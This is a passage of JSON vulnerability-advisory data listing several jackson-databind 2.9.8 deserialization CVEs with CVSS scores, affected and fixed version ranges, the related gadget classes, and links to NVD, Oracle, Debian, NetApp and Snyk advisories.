cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36185/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10672"]}],"cve":"CVE-2020-10672","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T16:32:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-10672"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10672/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36179"]}],"cve":"CVE-2020-36179","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-36179"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36179/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36183"]}],"cve":"CVE-2020-36183","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:34","ids":[{"system_name":"CVE Record","text":"CVE-2020-36183"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"]}],"title":"CVE-2020-36183/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11113"]}],"cve":"CVE-2020-11113","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-11113"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11113/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14062"]}],"cve":"CVE-2020-14062","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-14062"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14062/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14061"]}],"cve":"CVE-2020-14061","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-14061"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14061/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36181"]}],"cve":"CVE-2020-36181","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-36181"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36181/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36188"]}],"cve":"CVE-2020-36188","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:42","ids":[{"system_name":"CVE Record","text":"CVE-2020-36188"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36188/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10673"]}],"cve":"CVE-2020-10673","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:04","ids":[{"system_name":"CVE Record","text":"CVE-2020-10673"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka 